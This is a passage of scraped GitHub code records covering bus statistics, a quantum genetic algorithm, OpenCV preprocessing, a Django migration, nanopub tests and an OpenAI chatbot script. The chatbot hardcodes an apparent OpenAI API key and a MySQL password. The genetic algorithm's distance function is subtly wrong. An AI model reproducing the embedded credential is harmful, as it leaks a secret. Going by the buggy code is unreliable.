)[: input_array.shape[0], :70]\n\n def _calc_baseline_and_actual(self, data):\n\n se_min = data.copy()\n\n baseline_array = np.empty((se_min.shape[0], 70)).astype(float)\n baseline_array[:] = np.nan\n\n actual_array = np.empty((se_min.shape[0], 70)).astype(float)\n actual_array[:] = np.nan\n\n baseline_median_array = np.empty((se_min.shape[0], 70)).astype(float)\n baseline_median_array[:] = np.nan\n\n se_min = se_min.reset_index(drop=True)\n\n runs = se_min.groupby([\"date\", \"workid\"])\n\n actual_index = se_min.columns.get_loc(\"segment_duration\")\n baseline_index = se_min.columns.get_loc(\n \"mean_durations_by_segment_code_and_hour_and_day\"\n )\n baseline_median_index = se_min.columns.get_loc(\n \"median_durations_by_segment_code_and_hour_and_day\"\n )\n\n for _, run in runs:\n run = run.sort_values(\"actualArrival\")\n\n baseline_array[run.index, :] = self._create_triangle(\n run.iloc[:, baseline_index]\n )\n actual_array[run.index, :] = self._create_triangle(\n run.iloc[:, actual_index]\n )\n baseline_median_array[run.index, :] = self._create_triangle(\n run.iloc[:, baseline_median_index]\n )\n\n baseline_array_cum = np.cumsum(baseline_array, axis=1)\n actual_array_cum = np.cumsum(actual_array, axis=1)\n baseline_median_array_cum = np.cumsum(baseline_median_array, axis=1)\n\n actual_array_cum = np.clip(actual_array_cum, 0, 2 * 60 * 60)\n\n return baseline_array_cum, actual_array_cum, baseline_median_array_cum\n\n def _calc_prediction_cum_journeys(self, data, test, data_type=\"diff\"):\n\n se_min = data[\n [\n \"date\",\n \"workid\",\n \"actualArrival\",\n \"mean_durations_by_segment_code_and_hour_and_day\",\n ]\n ].copy()\n\n if data_type == \"diff\":\n se_min[\"prediction\"] = se_min[\n \"mean_durations_by_segment_code_and_hour_and_day\"\n ] * (1 + (test / 100))\n\n if data_type == \"speed\":\n se_min[\"prediction\"] = se_min[\"real_length\"] / test * 2.237\n\n if data_type == \"duration\":\n se_min[\"prediction\"] = test\n\n predict_array = np.empty((se_min.shape[0], 70)).astype(float)\n predict_array[:] = np.nan\n\n se_min = se_min.reset_index(drop=True)\n\n runs = se_min.groupby([\"date\", \"workid\"])\n\n prediction_index = se_min.columns.get_loc(\"prediction\")\n\n for _, run in runs:\n run = run.sort_values(\"actualArrival\")\n\n predict_array[run.index, :] = self._create_triangle(\n run.iloc[:, prediction_index]\n )\n\n predict_array_cum = np.cumsum(predict_array, axis=1)\n\n return predict_array_cum\n","repo_name":"gingertom/buses","sub_path":"pipeline/utils/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":11227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34079169941","text":"class IOmanager:\r\n def origin(self):\r\n with open(\"bras/config.txt\") as lines:\r\n \r\n values = [float(n.split(' ')[-1]) for n in lines]\r\n\r\n return values[0], values[1]\r\n\r\n def sudoku(self):\r\n with open(f\"generated_data/resolved_sudoku.txt\") as lines:\r\n sudoku = [\r\n [int(number) for number in n if (number != '\\n')]\r\n for n in lines\r\n ]\r\n return sudoku\r\n","repo_name":"Wermarty/Sudoku-Solver","sub_path":"project/bras/IOmanager.py","file_name":"IOmanager.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6411783027","text":"#!/usr/bin/env python\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntcpReadsRaw1G = (0.808, 0.7939, 0.8139)\ntcpReadsAvg1G = np.average(tcpReadsRaw1G)\ntcpReadsStd1G = np.std(tcpReadsRaw1G)\n\ntcpReadsNcRaw1G = (0.88606, 0.83474, 0.88464)\ntcpReadsNcAvg1G = np.average(tcpReadsNcRaw1G)\ntcpReadsNcStd1G = np.std(tcpReadsNcRaw1G)\n\nscrReadsRaw1G = (1.9305, 1.9526, 1.9529)\nscrReadsAvg1G = np.average(scrReadsRaw1G)\nscrReadsStd1G = np.std(scrReadsRaw1G)\n\nscrReadsNcRaw1G = (2.3661, 2.3495, 2.3445)\nscrReadsNcAvg1G = np.average(scrReadsNcRaw1G)\nscrReadsNcStd1G = np.std(scrReadsNcRaw1G)\n\nzcrReadsNcRaw1G = (5.8865, 5.8788, 5.8646)\nzcrReadsNcAvg1G = np.average(zcrReadsNcRaw1G)\nzcrReadsNcStd1G = np.std(zcrReadsNcRaw1G)\n\nN = 5\noneGbMeans = (tcpReadsAvg1G, tcpReadsNcAvg1G, scrReadsAvg1G, scrReadsNcAvg1G, zcrReadsNcAvg1G)\noneGbStd = (tcpReadsStd1G, tcpReadsNcStd1G, scrReadsStd1G, scrReadsNcStd1G, zcrReadsNcStd1G)\n\nind = np.arange(N)\nbarwidth = 0.35\n\nfig, ax = plt.subplots()\nrects1 = ax.bar(ind, oneGbMeans, barwidth, color='r', yerr=oneGbStd)\n\ntcpReadsRaw20G = ( 0.78764, 0.75296, 0.78238 )\ntcpReadsAvg20G = np.average(tcpReadsRaw20G)\ntcpReadsStd20G = np.std(tcpReadsRaw20G)\n\ntcpReadsNcRaw20G = ( 0.9147, 0.9244, 0.888 )\ntcpReadsNcAvg20G = np.average(tcpReadsNcRaw20G)\ntcpReadsNcStd20G = np.std(tcpReadsNcRaw20G)\n\nscrReadsRaw20G = (1.9387, 1.9295, 1.9342)\nscrReadsAvg20G = np.average(scrReadsRaw20G)\nscrReadsStd20G = np.std(scrReadsRaw20G)\n\nscrReadsNcRaw20G = (2.2875, 2.3336, 2.3552)\nscrReadsNcAvg20G = np.average(scrReadsNcRaw20G)\nscrReadsNcStd20G = np.std(scrReadsNcRaw20G)\n\nzcrReadsRaw20G = (2.675, 2.654, 2.633)\nzcrReadsAvg20G = np.average(zcrReadsRaw20G)\nzcrReadsStd20G = np.std(zcrReadsRaw20G)\n\ntwentyGbMeans = (tcpReadsAvg20G, tcpReadsNcAvg20G, scrReadsAvg20G, scrReadsNcAvg20G, zcrReadsAvg20G)\ntwentyGbStd = (tcpReadsStd20G, tcpReadsNcStd20G, scrReadsStd20G, scrReadsNcStd20G, zcrReadsStd20G)\nrects2 = ax.bar(ind+barwidth, twentyGbMeans, barwidth, color='y', yerr=twentyGbStd)\n\n# add some\nax.set_ylabel('GB/s')\nax.set_title('vecsum2 throughput')\nax.set_xticks(ind+barwidth)\nax.set_xticklabels( ('TCP', 'TCP-no-csum', 'SCR', 'SCR-no-csum', 'zero-copy') )\n\nax.legend( (rects1[0], rects2[0]), ('1 GB', '20 GB'), loc='left')\n\nplt.savefig(\"micro1.png\")\n\n","repo_name":"umbrant/caching_benchmarking","sub_path":"graphs/micro1.py","file_name":"micro1.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"2392449503","text":"#########################################################\r\n# #\r\n# QUANTUM GENETIC ALGORITHM (24.05.2016) #\r\n# #\r\n# R. Lahoz-Beltra #\r\n# #\r\n# THIS SOFTWARE IS PROVIDED BY THE AUTHOR \"AS IS\" AND #\r\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #\r\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY #\r\n# AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #\r\n# THE SOFWTARE CAN BE USED BY ANYONE SOLELY FOR THE #\r\n# PURPOSES OF EDUCATION AND RESEARCH. #\r\n# #\r\n#########################################################\r\nimport math\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.font_manager import FontProperties\r\nfrom numpy import testing\r\nfrom numpy.core.fromnumeric import ptp\r\n\r\n#########################################################\r\n# ALGORITHM PARAMETERS #\r\n#########################################################\r\nN = 50 # Define here the population size\r\nGenome = 22 # Define here the chromosome length\r\ngeneration_max = 450 # Define here the maximum number of\r\n# generations/iterations\r\n\r\n#########################################################\r\n# VARIABLES ALGORITHM #\r\n#########################################################\r\npopSize = N+1\r\ngenomeLength = Genome+1\r\ntop_bottom = 3\r\nQuBitZero = np.array([[1], [0]])\r\nQuBitOne = np.array([[0], [1]])\r\nAlphaBeta = np.empty([top_bottom])\r\nfitness = np.empty([popSize])\r\nprobability = np.empty([popSize])\r\n# qpv: quantum chromosome (or population vector, QPV)\r\nqpv = np.empty([popSize, genomeLength, top_bottom])\r\nnqpv = np.empty([popSize, genomeLength, top_bottom])\r\n# chromosome: classical chromosome\r\nchromosome = np.empty([popSize, genomeLength], dtype=np.int)\r\nchild1 = np.empty([popSize, genomeLength, top_bottom])\r\nchild2 = np.empty([popSize, genomeLength, top_bottom])\r\nbest_chrom = np.empty([generation_max])\r\n\r\n# Initialization global variables\r\ntheta = 0\r\niteration = 0\r\nthe_best_chrom = 0\r\ngeneration = 0\r\n#########################################################\r\n# QUANTUM POPULATION INITIALIZATION #\r\n#########################################################\r\ntest = []\r\nobj = [[0, 0], [-14, 60], [-18, 59], [39, 41], [85, 16],\r\n [16, 96], [96, 55], [75, 36], [11, 23], [75, 8], [32, 18]]\r\n\r\nrt = np.zeros(int(math.pow(2, Genome)))\r\n\r\n\r\ndef Init_sample():\r\n data = np.loadtxt('output_2.dat')\r\n for i in range(int(math.pow(2, Genome))):\r\n rt[i] = 99999999999\r\n # plot the first column as x, and second column as y\r\n rt_tmp = data[:, 1]\r\n k = 0\r\n for j in rt_tmp:\r\n rt[k] = j\r\n print(rt[k])\r\n k += 1\r\n\r\n\r\ndef Init_population():\r\n # Hadamard gate\r\n r2 = math.sqrt(2.0)\r\n h = np.array([[1/r2, 1/r2], [1/r2, -1/r2]])\r\n # Rotation Q-gate\r\n theta = 0\r\n rot = np.empty([2, 2])\r\n # Initial population array (individual x chromosome)\r\n i = 1\r\n j = 1\r\n for i in range(1, popSize):\r\n for j in range(1, genomeLength):\r\n theta = np.random.uniform(0, 1)*90\r\n theta = math.radians(theta)\r\n rot[0, 0] = math.cos(theta)\r\n rot[0, 1] = -math.sin(theta)\r\n rot[1, 0] = math.sin(theta)\r\n rot[1, 1] = math.cos(theta)\r\n AlphaBeta[0] = rot[0, 0] * \\\r\n (h[0][0]*QuBitZero[0])+rot[0, 1]*(h[0][1]*QuBitZero[1])\r\n AlphaBeta[1] = rot[1, 0] * \\\r\n (h[1][0]*QuBitZero[0])+rot[1, 1]*(h[1][1]*QuBitZero[1])\r\n # alpha squared\r\n qpv[i, j, 0] = np.around(2*pow(AlphaBeta[0], 2), 2)\r\n # beta squared\r\n qpv[i, j, 1] = np.around(2*pow(AlphaBeta[1], 2), 2)\r\n\r\n # i = 0\r\n # for j in range(1, 10):\r\n # route = distance((obj[j][0]-obj[0][0]), (obj[j][1]-obj[0][1]))\r\n # print(\"j is:\", j)\r\n # for l in range(1, 10):\r\n # if l == j:\r\n # continue\r\n # print(\"l is:\", l)\r\n # route = route + \\\r\n # distance((obj[l][0]-obj[j][0]), (obj[l][1]-obj[j][1]))\r\n # for a in range(1, 10):\r\n # if a == l or a == j:\r\n # continue\r\n # print(\"a is:\", a)\r\n # print(j, l, a, \"\\n\")\r\n # route = route + \\\r\n # distance((obj[a][0]-obj[l][0]),\r\n # (obj[a][1]-obj[l][1]))\r\n # route = route + \\\r\n # distance((obj[0][0]-obj[a][0]),\r\n # (obj[0][1]-obj[a][1]))\r\n # rt[i] = route\r\n # i += 1\r\n\r\n # k = 0\r\n # for i in range(1, 11):\r\n # route_i = distance((obj[i][0]-obj[0][0]), (obj[i][1]-obj[0][1]))\r\n # for j in range(1, 11):\r\n # if j == i:\r\n # continue\r\n # route_j = route_i + \\\r\n # distance((obj[j][0]-obj[i][0]), (obj[j][1]-obj[i][1]))\r\n # for l in range(1, 11):\r\n # if l == i or l == j:\r\n # continue\r\n # route_l = route_j + \\\r\n # distance((obj[l][0]-obj[j][0]), (obj[l][1]-obj[j][1]))\r\n # for a in range(1, 11):\r\n # if a == i or a == j or a == l:\r\n # continue\r\n # route_a = route_l + \\\r\n # distance((obj[a][0]-obj[l][0]), (obj[a][1]-obj[l][1]))\r\n # for b in range(1, 11):\r\n # if b == i or b == j or b == l or b == a:\r\n # continue\r\n # route_b = route_a + \\\r\n # distance((obj[b][0]-obj[a][0]),\r\n # (obj[b][1]-obj[a][1]))\r\n # for c in range(1, 11):\r\n # if c == i or c == j or c == l or c == a or c == b:\r\n # continue\r\n # route_c = route_b + \\\r\n # distance((obj[c][0]-obj[b][0]),\r\n # (obj[c][1]-obj[b][1]))\r\n # for d in range(1, 11):\r\n # if d == i or d == j or d == l or d == a or d == b or d == c:\r\n # continue\r\n # route_d = route_c + \\\r\n # distance((obj[d][0]-obj[c][0]),\r\n # (obj[d][1]-obj[c][1]))\r\n # for e in range(1, 11):\r\n # if e == i or e == j or e == l or e == a or e == b or e == c or e == d:\r\n # continue\r\n # route_e = route_d + \\\r\n # distance(\r\n # (obj[e][0]-obj[d][0]), (obj[e][1]-obj[d][1]))\r\n # for f in range(1, 11):\r\n # if f == i or f == j or f == l or f == a or f == b or f == c or f == d or f == e:\r\n # continue\r\n # route_f = route_e + \\\r\n # distance(\r\n # (obj[f][0]-obj[e][0]), (obj[f][1]-obj[e][1]))\r\n # for g in range(1, 11):\r\n # if g == i or g == j or g == l or g == a or g == b or g == c or g == d or g == e or g == f:\r\n # continue\r\n # route_g = route_f + \\\r\n # distance(\r\n # (obj[g][0]-obj[f][0]), (obj[g][1]-obj[f][1]))\r\n # route_0 = route_g + \\\r\n # distance(\r\n # (obj[0][0]-obj[g][0]), (obj[0][1]-obj[g][1]))\r\n # print(i, j, l, a, b, c, d, e, f, g)\r\n # print(\"\")\r\n # fi = open(\"output_2.dat\", \"a\")\r\n # # f.write(str(generation)+\" \"+str(fitness_average)+\"\\n\")\r\n # fi.write(\r\n # str(k)+\" \"+str(route_0)+\"\\n\")\r\n # fi.write(\" \\n\")\r\n # fi.close()\r\n # rt[k] = route_0\r\n # print(route_0)\r\n\r\n # k += 1\r\n\r\n\r\ndef distance(x, y):\r\n r = math.sqrt(pow(x, 2) * pow(y, 2))\r\n return r\r\n\r\n\r\n#########################################################\r\n# SHOW QUANTUM POPULATION #\r\n#########################################################\r\n\r\n\r\ndef Show_population():\r\n i = 1\r\n j = 1\r\n for i in range(1, popSize):\r\n print()\r\n print()\r\n print(\"qpv = \", i, \" : \")\r\n print()\r\n for j in range(1, genomeLength):\r\n print(qpv[i, j, 0], end=\"\")\r\n print(\" \", end=\"\")\r\n print()\r\n for j in range(1, genomeLength):\r\n print(qpv[i, j, 1], end=\"\")\r\n print(\" \", end=\"\")\r\n print()\r\n\r\n#########################################################\r\n# MAKE A MEASURE #\r\n#########################################################\r\n# p_alpha: probability of finding qubit in alpha state\r\n\r\n\r\ndef Measure(p_alpha):\r\n for i in range(1, popSize):\r\n print()\r\n for j in range(1, genomeLength):\r\n if p_alpha <= qpv[i, j, 0]:\r\n chromosome[i, j] = 0\r\n else:\r\n chromosome[i, j] = 1\r\n print(chromosome[i, j], \" \", end=\"\")\r\n print()\r\n\r\n#########################################################\r\n# FITNESS EVALUATION #\r\n#########################################################\r\n\r\n\r\ndef Fitness_evaluation(generation):\r\n i = 1\r\n j = 1\r\n fitness_total = 0\r\n sum_sqr = 0\r\n fitness_average = 0\r\n variance = 0\r\n for i in range(1, popSize):\r\n fitness[i] = 0\r\n\r\n#########################################################\r\n# Define your problem in this section. For instance: #\r\n# #\r\n# Let f(x)=abs(x-5/2+sin(x)) be a function that takes #\r\n# values in the range 0<=x<=15. Within this range f(x) #\r\n# has a maximum value at x=11 (binary is equal to 1011) #\r\n#########################################################\r\n for i in range(1, popSize):\r\n x = 0\r\n for j in range(1, genomeLength):\r\n # translate from binary to decimal value\r\n x = x + chromosome[i, j]*pow(2, genomeLength-j-1)\r\n # replaces the value of x in the function f(x)\r\n # y = np.fabs((x-5)/(2+np.sin(x)))\r\n # the fitness value is calculated below:\r\n # (Note that in this example is multiplied\r\n # by a scale value, e.g. 100)\r\n # print(\"x is\", x, \"\\n\")\r\n y = rt[x]\r\n # print(\"y is\", y, \"\\n\")\r\n fitness[i] = y * 100\r\n#########################################################\r\n\r\n print(\"fitness\", i, \"=\", fitness[i])\r\n fitness_total = fitness_total + fitness[i]\r\n fitness_average = fitness_total/N\r\n i = 1\r\n while i <= N:\r\n # sum_sqr = sum_sqr+pow(fitness[i]-fitness_average, 2)\r\n sum_sqr = sum_sqr+pow(fitness[i]-fitness_average, 2)\r\n i = i+1\r\n variance = sum_sqr/N\r\n if variance <= 1.0e-4:\r\n variance = 0.0\r\n # Best chromosome selection\r\n the_best_chrom = 0\r\n fitness_max = fitness[1]\r\n for i in range(1, popSize):\r\n if fitness[i] <= fitness_max:\r\n fitness_max = fitness[i]\r\n the_best_chrom = i\r\n best_chrom[generation] = the_best_chrom\r\n # Statistical output\r\n print(\"the best num is:\", the_best_chrom)\r\n print(\"the distance is :\", fitness_max/100)\r\n f = open(\"output.dat\", \"a\")\r\n # f.write(str(generation)+\" \"+str(fitness_average)+\"\\n\")\r\n f.write(str(generation)+\" \"+str(fitness_max/100)+\"\\n\")\r\n f.write(\" \\n\")\r\n f.close()\r\n if generation == 449:\r\n return fitness_max/100\r\n else:\r\n return 0\r\n # print(\"Population size = \", popSize - 1)\r\n # print(\"mean fitness = \", fitness_average)\r\n # print(\"variance = \", variance, \"\\n\",\r\n # \" Std. deviation = \", math.sqrt(variance))\r\n # print(\"fitness max = \", best_chrom[generation])\r\n # print(\"fitness sum = \", fitness_total)\r\n\r\n#########################################################\r\n# QUANTUM ROTATION GATE #\r\n#########################################################\r\n\r\n\r\ndef rotation():\r\n rot = np.empty([2, 2])\r\n # Lookup table of the rotation angle\r\n for i in range(1, popSize):\r\n for j in range(1, genomeLength):\r\n if fitness[i] < fitness[int(best_chrom[generation])]:\r\n # if chromosome[i,j]==0 and chromosome[best_chrom[generation],j]==0:\r\n if chromosome[i, j] == 0 and chromosome[int(best_chrom[generation]), j] == 1:\r\n # Define the rotation angle: delta_theta (e.g. 0.0785398163)\r\n delta_theta = 0.0785398163\r\n rot[0, 0] = math.cos(delta_theta)\r\n rot[0, 1] = -math.sin(delta_theta)\r\n rot[1, 0] = math.sin(delta_theta)\r\n rot[1, 1] = math.cos(delta_theta)\r\n nqpv[i, j, 0] = (rot[0, 0]*qpv[i, j, 0]) + \\\r\n (rot[0, 1]*qpv[i, j, 1])\r\n nqpv[i, j, 1] = (rot[1, 0]*qpv[i, j, 0]) + \\\r\n (rot[1, 1]*qpv[i, j, 1])\r\n qpv[i, j, 0] = round(nqpv[i, j, 0], 2)\r\n qpv[i, j, 1] = round(1-nqpv[i, j, 0], 2)\r\n if chromosome[i, j] == 1 and chromosome[int(best_chrom[generation]), j] == 0:\r\n # Define the rotation angle: delta_theta (e.g. -0.0785398163)\r\n delta_theta = -0.0785398163\r\n rot[0, 0] = math.cos(delta_theta)\r\n rot[0, 1] = -math.sin(delta_theta)\r\n rot[1, 0] = math.sin(delta_theta)\r\n rot[1, 1] = math.cos(delta_theta)\r\n nqpv[i, j, 0] = (rot[0, 0]*qpv[i, j, 0]) + \\\r\n (rot[0, 1]*qpv[i, j, 1])\r\n nqpv[i, j, 1] = (rot[1, 0]*qpv[i, j, 0]) + \\\r\n (rot[1, 1]*qpv[i, j, 1])\r\n qpv[i, j, 0] = round(nqpv[i, j, 0], 2)\r\n qpv[i, j, 1] = round(1-nqpv[i, j, 0], 2)\r\n # if chromosome[i,j]==1 and chromosome[best_chrom[generation],j]==1:\r\n\r\n#########################################################\r\n# X-PAULI QUANTUM MUTATION GATE #\r\n#########################################################\r\n# pop_mutation_rate: mutation rate in the population\r\n# mutation_rate: probability of a mutation of a bit\r\n\r\n\r\ndef mutation(pop_mutation_rate, mutation_rate):\r\n\r\n for i in range(1, popSize):\r\n up = np.random.random_integers(100)\r\n up = up/100\r\n if up <= pop_mutation_rate:\r\n for j in range(1, genomeLength):\r\n um = np.random.random_integers(100)\r\n um = um/100\r\n if um <= mutation_rate:\r\n nqpv[i, j, 0] = qpv[i, j, 1]\r\n nqpv[i, j, 1] = qpv[i, j, 0]\r\n else:\r\n nqpv[i, j, 0] = qpv[i, j, 0]\r\n nqpv[i, j, 1] = qpv[i, j, 1]\r\n else:\r\n for j in range(1, genomeLength):\r\n nqpv[i, j, 0] = qpv[i, j, 0]\r\n nqpv[i, j, 1] = qpv[i, j, 1]\r\n for i in range(1, popSize):\r\n for j in range(1, genomeLength):\r\n qpv[i, j, 0] = nqpv[i, j, 0]\r\n qpv[i, j, 1] = nqpv[i, j, 1]\r\n\r\n#########################################################\r\n# PERFORMANCE GRAPH #\r\n#########################################################\r\n# Read the Docs in http://matplotlib.org/1.4.1/index.html\r\n\r\n\r\ndef plot_Output():\r\n data = np.loadtxt('best_result.dat')\r\n # plot the first column as x, and second column as y\r\n y = data[:, 0]\r\n x = data[:, 1]\r\n # f = plt.figure()\r\n plt.show()\r\n plt.plot(y, x)\r\n plt.xlabel('Exercies times')\r\n plt.ylabel('the best distance')\r\n plt.xlim(0, 50)\r\n plt.show()\r\n\r\n########################################################\r\n# #\r\n# MAIN PROGRAM #\r\n# #\r\n########################################################\r\n\r\n\r\ndef Q_GA():\r\n generation = 0\r\n print(\"============== GENERATION: \", generation,\r\n \" =========================== \")\r\n print()\r\n\r\n Init_population()\r\n Show_population()\r\n Measure(0.5)\r\n Fitness_evaluation(generation)\r\n for i in range(0, popSize):\r\n if i == 0:\r\n for j in range(0, genomeLength):\r\n chromosome[i, j] = 0\r\n chromosome[i, 0] = 0\r\n while (generation < generation_max-1):\r\n print(\"The best of generation [\",\r\n generation, \"] \", best_chrom[generation])\r\n print()\r\n print(\"============== GENERATION: \", generation +\r\n 1, \" =========================== \")\r\n print()\r\n rotation()\r\n mutation(0.01, 0.001)\r\n generation = generation+1\r\n Measure(0.5)\r\n re = Fitness_evaluation(generation)\r\n return re\r\n\r\n\r\nprint(\"\"\"QUANTUM GENETIC ALGORITHM\"\"\")\r\nf = open(\"output.dat\", \"w\")\r\n# fi = open(\"output_2.dat\", \"w\")\r\nfi3 = open(\"best_result.dat\", \"w\")\r\n\r\n\r\ninput(\"Press Enter to continue...\")\r\nInit_sample()\r\nfor i in range(50):\r\n max = Q_GA()\r\n fi3 = open(\"best_result.dat\", \"a\")\r\n # f.write(str(generation)+\" \"+str(fitness_average)+\"\\n\")\r\n fi3.write(str(i)+\" \"+str(max)+\"\\n\")\r\n fi3.write(\" \\n\")\r\n fi3.close()\r\n# Init_population()\r\n# print(rt)\r\nplot_Output()\r\n","repo_name":"tku-iarc/timda-mobile","sub_path":"strategy/script/timda-advance/QGA.py","file_name":"QGA.py","file_ext":"py","file_size_in_byte":18820,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"32992627831","text":"def solution(citations):\n answer = 0\n citations.sort(reverse = True)\n for i in range(len(citations),-1,-1):\n count = 0\n for j in citations:\n if j >= i:\n count+=1\n if count >= i and len(citations)-count <=i:\n return i","repo_name":"kimdahee7/CodingTest_Python","sub_path":"프로그래머스/2/42747. H-Index/H-Index.py","file_name":"H-Index.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12111777204","text":"\"\"\"\n\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n\ndef createPreview(image_name, prev_image_name):\n src = cv2.imread(image_name, cv2.IMREAD_COLOR)\n\n prev = cv2.resize(src, dsize=(340, 240), fx=0.3, fy=0.7, interpolation=cv2.INTER_LINEAR)\n\n cv2.imwrite(prev_image_name, prev)\n\ndef preProcess(image_name, target_image_name, gray, threashold):\n # Check Parameters\n # print(\"gray: {gray}, threashold: {threashold}\".format(gray=gray, threashold=threashold))\n\n # Import image to edit\n src = cv2.imread(image_name, cv2.IMREAD_COLOR)\n\n is_edited = False\n\n if gray:\n src = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\n is_edited = True\n \n if (gray & threashold):\n # src = cv2.adaptiveThreshold(src, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 15, 2)\n ret, src = cv2.threshold(src, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n is_edited = True\n\n # Make target.png\n cv2.imwrite(target_image_name, src)\n\n print('Returning: ', is_edited) \n return is_edited\n\n \n","repo_name":"RelaxBacteria/Live-Dictionary","sub_path":"source/preProcess.py","file_name":"preProcess.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36869827052","text":"import datetime\nimport mysql.connector\nimport openai\nif __name__ == \"__main__\":\n openai.api_key = \"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\"\n conn = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root@123\",\n database=\"mysql\"\n )\n cursor = conn.cursor()\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS history (\n QUERY VARCHAR(50) NOT NULL,\n ANSWER VARCHAR(500) NOT NULL,\n date DATE NOT NULL\n );\"\"\");\n while (1):\n prompt = input(\"user: \")\n\n if (prompt == \"exit\"):\n break;\n\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[{\"role\": \"user\", \"content\": prompt}]\n )\n print(\"bot: \"+response['choices'][0]['message']['content'])\n print()\n res = \"\"\n res += prompt\n res += \"\\n\"\n res += response['choices'][0]['message']['content']\n date_now = datetime.datetime.now();\n sql = \"INSERT INTO CHATGPT (QUERY,ANSWER,date) VALUES (%s, %s, %s)\"\n val = (prompt,response['choices'][0]['message']['content'],date_now)\n cursor.execute(sql, val)\n conn.commit()\n","repo_name":"anirudh89201/chat-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34259130942","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('jobs', '0006_auto_20151116_0700'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='JobExportRequest',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('created_by', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ('export', models.ForeignKey(to='jobs.JobExport')),\n ],\n ),\n migrations.AddField(\n model_name='job',\n name='created_by',\n field=models.ForeignKey(default=3, to=settings.AUTH_USER_MODEL),\n preserve_default=False,\n ),\n ]\n","repo_name":"aeud/sing","sub_path":"apps/jobs/migrations/0007_auto_20151116_0720.py","file_name":"0007_auto_20151116_0720.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1478793632","text":"\nimport json\nfrom rdflib import ConjunctiveGraph, Graph, URIRef\nfrom rdflib.namespace import RDF\nfrom whyis.test.api_test_case import ApiTestCase\n\n\nclass NanopubTest(ApiTestCase):\n\n turtle = '''\n \"Professor\";\n \"Jane Doe\" ;\n \"(425) 123-4567\" ;\n ;\n .\n'''\n\n def test_create(self):\n self.login_new_user()\n response = self.publish_nanopub(data=self.turtle,\n content_type=\"text/turtle\",\n expected_headers=[\"Location\"])\n\n nanopub = self.app.nanopub_manager.get(URIRef(response.headers['Location']))\n self.assertEquals(len(nanopub), 17)\n self.assertEquals(len(nanopub.assertion), 5)\n self.assertEquals(len(nanopub.pubinfo), 5)\n self.assertEquals(len(nanopub.provenance), 0)\n\n def test_read(self):\n self.login_new_user()\n response = self.publish_nanopub(data=self.turtle,\n content_type=\"text/turtle\",\n expected_headers=[\"Location\"])\n\n nanopub_id = response.headers['Location'].split('/')[-1]\n content = self.client.get(\"/pub/\"+nanopub_id,\n headers={'Accept':'application/json'},\n follow_redirects=True)\n g = ConjunctiveGraph()\n self.assertEquals(content.mimetype, \"application/json\")\n g.parse(data=str(content.data, 'utf8'), format=\"json-ld\")\n\n self.assertEquals(len(g), 17)\n self.assertEquals(g.value(URIRef('http://example.com/janedoe'), RDF.type),\n URIRef('http://schema.org/Person'))\n\n def test_delete_admin(self):\n self.login_new_user()\n response = self.publish_nanopub(data=self.turtle,\n content_type=\"text/turtle\",\n expected_headers=[\"Location\"])\n\n nanopub_id = response.headers['Location'].split('/')[-1]\n response = self.client.delete(\"/pub/\"+nanopub_id, follow_redirects=True)\n self.assertEquals(response.status, '204 NO CONTENT')\n\n def test_delete_nonadmin(self):\n self.login_new_user(role=None)\n response = self.publish_nanopub(data=self.turtle,\n content_type=\"text/turtle\",\n expected_headers=[\"Location\"])\n\n nanopub_id = response.headers['Location'].split('/')[-1]\n response = self.client.delete(\"/pub/\"+nanopub_id, follow_redirects=True)\n self.assertEquals(response.status, '204 NO CONTENT')\n\n def test_linked_data(self):\n self.login_new_user()\n self.publish_nanopub(data=self.turtle,\n content_type=\"text/turtle\")\n\n # Because of (lack of) content negotiation\n content = self.get_view(uri=\"http://example.com/janedoe\",\n mime_type=\"text/turtle\")\n\n g = Graph()\n g.parse(data=str(content.data, 'utf8'), format=\"turtle\")\n\n self.assertEquals(len(g), 5)\n self.assertEquals(g.value(URIRef('http://example.com/janedoe'), RDF.type),\n URIRef('http://schema.org/Person'))\n\n def test_mime_behavior(self):\n self.login_new_user()\n self.publish_nanopub(data=self.turtle,\n content_type=\"text/turtle\")\n\n self.get_view(uri=\"http://example.com/janedoe\",\n mime_type=\"text/turtle\",\n expected_template=\"describe.json\")\n\n self.get_view(uri=\"http://example.com/janedoe\",\n headers={'Accept': 